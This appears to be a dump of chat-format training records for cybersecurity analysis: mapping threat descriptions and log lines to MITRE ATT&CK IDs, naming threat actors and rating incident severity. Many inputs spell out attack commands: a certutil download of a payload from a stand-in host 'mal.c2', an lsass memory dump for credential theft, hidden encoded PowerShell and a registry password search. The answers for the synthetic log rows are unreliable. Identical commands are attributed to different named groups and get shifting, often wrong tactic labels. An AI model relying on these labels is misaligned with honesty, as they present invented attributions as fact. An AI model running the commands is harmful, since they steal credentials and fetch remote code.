messages
listlengths
2
2
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (APP-WEB-NMCO4IZXT0)\nNetwork Activity: TLSv1.2/TCP to update.microsoft.com\nAttack Tactics: Exfiltration", "role": "user" }, { "content": "{\"seve...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: certutil.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: TLSv1.2/TCP connection to 1.176.94.92", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\", \"TA0011\"], \"techniques\...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: One of the discovered config files contained a URL with an as yet unidentified md5: hxxps://46.165.222(dot)28/upgrade/bf0dac805798cc1f633f19ce8ed6382f/upgrade.php Victim set #4 A set of victims discovered installed S...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: LOLBin, TLS, Fileless", "role": "user" }, { "content": "{\"actor\": \"UNC4841\", \"co...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Fileless, LOLBin, Base64", "role": "user" }, { "content": "{\"actor\": \"Scattered Sp...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: powershell.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.143.88.139", "role": "user" }, { "content": "{\"tactics\": [\"T...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: This PowerShell script is ineffective in gathering rules with modified PR_RULE_MSG_NAME and PR_RULE_MSG_PROVIDER properties caused by adversaries using a Microsoft Exchange Server Messaging API Editor (MAPI Editor), ...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (AZURE-VM-Q1GLRBK60J)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Reconnaissance, Defense Evasion, Execution", "role": "user" ...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: certutil.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: TLSv1.3/TCP connection to 1.162.81.20", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\", \"TA0006\", \"TA0009\"], \"techniques\...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: WMI, LOLBin, Fileless", "role": "user" }, { "content": "{\"actor\": \"Volt Typhoon\", \"co...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2891 C:\\temp\\lsass.dmp full\nEvasion Methods: LOLBin, Base64, Fileless", "role": "user" }, { "content": "{\"actor\": \"FIN7\", \"confide...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: cmstp.exe executing: rundll32.exe comsvcs.dll, MiniDump 3666 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.101.124.125", "role": "user" }, { "content": "{\"tactics\": [\"TA0009\"], \"techniques\...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: SCREEN Takes a PNG screenshot of the main screen and names the file with timestamps, then uploads it to the C2 server using POST at the path “/FeedBack.php”", "role": "user" }, { "content": "{\"tactics\":...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: By using this method, it will copy itself into a running Internet Explorer process in order to avoid detection by running as an independent process", "role": "user" }, { "content": "{\"tactics\": [\"TA000...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (DB-ORACLE-D82NMC2DGG)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Defense Evasion", "role": "user" }, { "content": "{\"sever...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: ZxShell has a command, ps, to obtain a listing of processes on the system.", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1057\"]}", "role": "assistant" } ]
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Monitor for changes made to firmware for unexpected modifications to settings and/or data that may use a hidden file system to conceal malicious activity from users and security tools.", "role": "user" }, { ...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 3924 C:\\temp\\lsass.dmp full\nEvasion Methods: Fileless, JA3 Spoof, WMI", "role": "user" }, { "content": "{\"actor\": \"Lapsus$\", \"conf...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (EC2-INST-LHJ2GL554T)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Execution, Persistence, Initial Access", "role": "user" }, { "co...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (IAM-ROLE-Z6JAHWL64K)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Execution, Defense Evasion, Impact", "role": "user" }, { "content": "{\"...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: cmstp.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: TLSv1.2/TCP connection to 1.92.7.19", "role": "user" }, { "content": "{\"tactics\": [\"TA0004\", \"TA0009\...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: JA3 Spoof, TLS, WMI", "role": "user" }, { "content": "{\"actor\": \"Scattered Spider...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: powershell.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.50.68.233", "role": "user" }, { "content": "{\"tactics\": [\"TA0008\", \"TA00...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: rundll32.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.161.176.52", "role": "user" }, { "content": "{\"tactics\": [\"TA0...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: certutil.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: HTTP/TCP connection to 1.31.106.166", "role": "user" }, { "content": "{\"tactics\": [\"TA0043\"...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: certutil.exe executing: rundll32.exe comsvcs.dll, MiniDump 3410 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.41.139.14", "role": "user" }, { "content": "{\"tactics\": [\"TA0043\"], \"techniques\": [\"T1566....
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: smb and exploit in same sentence", "role": "user" }, { "content": "{\"tactics\": [\"TA0008\"], \"techniques\": [\"T1210\"]}", "role": "assistant" } ]
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: certutil.exe executing: rundll32.exe comsvcs.dll, MiniDump 3068 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.117.100.45", "role": "user" }, { "content": "{\"tactics\": [\"TA000...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: mshta.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.158.199.221", "role": "user" }, { "content": "{\"tactics\": [\"TA...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: WMI, LOLBin, TLS", "role": "user" }, { "content": "{\"actor\": \"Mustang Panda\", \"confidence\": \"Hi...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Daserf uses encrypted Windows APIs and also encrypts data using the alternative base64+RC4 or the Caesar cipher.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1027\"]}", "role": "assi...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Confucius has exfiltrated stolen files to its C2 server.", "role": "user" }, { "content": "{\"tactics\": [\"TA0010\"], \"techniques\": [\"T1041\"]}", "role": "assistant" } ]
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: certutil.exe executing: rundll32.exe comsvcs.dll, MiniDump 1704 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.96.130.77", "role": "user" }, { "content": "{\"tactics\": [\"TA0040\", \"TA0008\", \"TA0004\"], \...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (EC2-INST-IK0VE1EDJS)\nNetwork Activity: TLSv1.3/TCP to cdn-content.com\nAttack Tactics: Credential Access, Lateral Movement", "role": "user" }, { ...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Base64, Fileless, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"Lapsus$\"...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (IAM-ROLE-HBQOMH3DP0)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Command and Control, Impact", "role": "user" }, { "content": "{\"severity...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Creddump7 can then be used to process the SAM database locally to retrieve hashes.", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\"], \"techniques\": [\"T1003\", \"T1003.002\"]}", "role": "...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: certutil.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.170.73.193", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\", \"TA0040\", \"TA0003...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: cmstp.exe executing: rundll32.exe comsvcs.dll, MiniDump 1770 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.12.28.236", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\"], \"techniques...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (AZURE-VM-YWX50H1Y77)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Discovery, Collection, Execution", "role": "user" }, { "content": "{\"...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (EC2-INST-96EJX346RR)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Execution, Reconnaissance, Exfiltration", "role": "user" }, { ...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: wmic.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: TLSv1.3/TCP connection to 1.156.95.130", "role": "user" }, { "content": "{\"tactics\": [\"TA0043\", \"TA0011\"], \"techniqu...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (IAM-ROLE-V150DL88G2)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Lateral Movement, Credential Access, Exfiltration", "role": "user" },...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Monitor for changes made to files for unexpected modifications to internal and external websites for unplanned content changes.", "role": "user" }, { "content": "{\"tactics\": [\"TA0040\"], \"techniques\": [\"T1491\"]}", ...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: rundll32.exe executing: rundll32.exe comsvcs.dll, MiniDump 3648 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.84.165.129", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: reg query HKLM /f password /t REG_SZ /s", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\"], \"techniques\": [\"T1552\", \"T1552.002\"]}", "role": "assistant" } ]
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: The group has also set the creation time of the files dropped by the second stage of the exploit to match the creation time of kernel32.dll.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techn...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: wmic.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.86.112.35", "role": "user" }, { "content": "{\"tactics\": [\"TA004...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1103 C:\\temp\\lsass.dmp full\nEvasion Methods: Base64, WMI, TLS", "role": "user" }, { "content": "{\"actor\": \"UNC4841\", \"confidence\"...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: CookieMiner has used a Unix shell script to run a series of commands targeting macOS.", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1059.004\", \"T1059\"]}", "role": "ass...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: C:\\Windows\\System32\\utilman.exe", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\", \"TA0004\"], \"techniques\": [\"T1546.008\", \"T1546\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (EC2-INST-75L2S84Z77)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Initial Access", "role": "user" }, { "content": "{\"severity\": \"H...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: GrimAgent can collect data and files from a compromised host.", "role": "user" }, { "content": "{\"tactics\": [\"TA0009\"], \"techniques\": [\"T1005\"]}", "role": "assistant" } ]
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: wmic.exe executing: rundll32.exe comsvcs.dll, MiniDump 2094 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.155.12.71", "role": "user" }, { "content": "{\"tactics\": [\"TA0040\", \"TA0004\"], \"techniques\": [...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Maze has checked the language of the machine with function GetUserDefaultUILanguage and terminated execution if the language matches with an entry in the predefined list.", "role": "user" }, { "content": "{\"ta...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2314 C:\\temp\\lsass.dmp full\nEvasion Methods: JA3 Spoof, Base64, Fileless", "role": "user" }, { "content": "{\"actor\": \"Mustang Panda\...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (APP-WEB-NNQYU6HZUA)\nNetwork Activity: TLSv1.3/TCP to cdn-content.com\nAttack Tactics: Exfiltration, Persistence, Execution", "role": "user" }, { "conten...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: mshta.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.65.32.124", "role": "user" }, { "content": "{\"tactics\": [\"TA0043\", \"TA0010...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: BLUELIGHT can collect IP information from the victim’s machine.", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1016\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1598 C:\\temp\\lsass.dmp full\nEvasion Methods: LOLBin, WMI, Fileless", "role": "user" }, { "content": "{\"actor\": \"Mustang Panda\", \"c...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Leafminer has obtained and used tools such as LaZagne, Mimikatz, PsExec, and MailSniper.", "role": "user" }, { "content": "{\"tactics\": [\"TA0042\"], \"techniques\": [\"T1588\", \"T1588.002\"]}", "ro...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (APP-WEB-Z8N2P9D619)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Exfiltration", "role": "user" }, { "content": "{\"severity\": \"Criti...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: looks for net and account or domain in close proximity", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1201\"]}", "role": "assistant" } ]
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: certutil.exe executing: rundll32.exe comsvcs.dll, MiniDump 1613 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.173.33.102", "role": "user" }, { "content": "{\"tactics\": [\"TA0040\", \"TA0043\", \"TA0009\"], ...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (APP-WEB-0Q0NHZV68C)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Privilege Escalation", "role": "user" }, { "content": "{\"seve...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Attor’s plugin deletes the collected files and log files after exfiltration.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1070\", \"T1070.004\"]}", "role": "assist...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment ( Lateral Tool Transfer).", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\"], \"t...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Explosive has used HTTP for communication.", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1071\", \"T1071.001\"]}", "role": "assistant" } ]
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: powershell.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.183.60.32", "role": "user" }, { "content": "{\"tactics\": [\"TA0009\", \"TA0011\", \"TA000...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (APP-WEB-AOPB2LZGHJ)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Discovery", "role": "user" }, { "content": "{\"severity\": \"Ex...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: mshta.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.103.183.238", "role": "user" }, { "content": "{\"tactics\": [\"TA...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Indrik Spider has used PsExec to stop services prior to the execution of ransomware.", "role": "user" }, { "content": "{\"tactics\": [\"TA0040\"], \"techniques\": [\"T1489\"]}", "role": "assistant" ...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2771 C:\\temp\\lsass.dmp full\nEvasion Methods: Fileless, JA3 Spoof, Base64", "role": "user" }, { "content": "{\"actor\": \"Volt Typhoon\"...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: wmic.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.73.145.28", "role": "user" }, { "content": "{\"tactics\": [\"TA0009\", \"TA0007\"], \"techniques\":...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: It is not configured by default and has hardware and firmware system requirements.", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\"], \"techniques\": [\"T1003\", \"T1003.001\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (DB-ORACLE-98E9WR6306)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Exfiltration, Impact, Initial Access", "role": "user" }, { "conte...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (EC2-INST-8W0SIBQ2IF)\nNetwork Activity: TLSv1.2/TCP to update.microsoft.com\nAttack Tactics: Impact, Privilege Escalation", "role": "user" }, { "content"...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: FinFisher contains junk code in its functions in an effort to confuse disassembly programs.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1027\", \"T1027.001\"]}", "role": "assistant"...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: certutil.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.115.31.139", "role": "user" }, { "content": "{\"tactics\": [\"TA0008\", \"TA0010\"], \"techn...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: certutil.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.18.34.217", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\", \"TA0006\"], \"techni...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: They can modify the tool by removing the indicator and using the updated version that is no longer detected by the target's defensive systems or subsequent targets that may use similar systems.", "role": "user" ...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: wmic.exe executing: rundll32.exe comsvcs.dll, MiniDump 1906 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.185.214.236", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\", \"TA0010\"],...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Regularly check installed IIS components to verify the integrity of the web server and identify if unexpected changes have been made.", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\"], \"techni...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: powershell.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.16.94.134", "role": "user" }, { "content": "{\"tactics\": [\"TA0001\", \"T...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: mshta.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.133.86.69", "role": "user" }, { "content": "{\"tactics\": [\"TA0009\...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Generally, the links will be accompanied by social engineering text and require the user to actively click or copy and paste a URL into a browser, leveraging User Execution.", "role": "user" }, { "content...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Chimera has used the quser command to show currently logged on users.", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1033\"]}", "role": "assistant" } ]
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Chimera has harvested data from remote mailboxes including through execution of \\\\c$\\Users\\\\AppData\\Local\\Microsoft\\Outlook*.ost.", "role": "user" }, { "content": "{\"tactics\": [\"TA0009\"], \"te...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1926 C:\\temp\\lsass.dmp full\nEvasion Methods: TLS, JA3 Spoof, Base64", "role": "user" }, { "content": "{\"actor\": \"UNC4841\", \"confid...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Lazarus Group malware IndiaIndia saves information gathered about the victim to a file that is saved in the %TEMP% directory, then compressed, encrypted, and uploaded to a C2 server.", "role": "user" }, { "content": "{\"tac...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (EC2-INST-3K5GZDN4I1)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Defense Evasion, Exfiltration, Execution", "role": "user" }, { "conten...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Gamaredon Group has delivered spearphishing emails with malicious attachments to targets.", "role": "user" }, { "content": "{\"tactics\": [\"TA0001\"], \"techniques\": [\"T1566\", \"T1566.001\"]}", "role": ...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Files can also be transferred using native or otherwise present tools on the victim system, such as scp, rsync, curl, sftp, and ftp.", "role": "user" }, { "content": "{\"tactics\": [\"TA0008\"], \"techniq...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: CoinTicker initially downloads a hidden encoded file.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1027\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: LOLBin, WMI, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"APT41\", \"con...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (APP-WEB-NMG80VG789)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Discovery, Execution", "role": "user" }, { "content": "{\"severity\": \...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1367 C:\\temp\\lsass.dmp full\nEvasion Methods: Base64, TLS, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"Volt Typhoon\", \"c...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: WMI, LOLBin, Base64", "role": "user" }, { "content": "{\"actor\": \"UNC4841\", \"confidenc...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Dridex contains a module for VNC.", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1219\"]}", "role": "assistant" } ]
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: wmic.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.194.243.194", "role": "user" }, { "content": "{\"tactics\": [\"TA0002...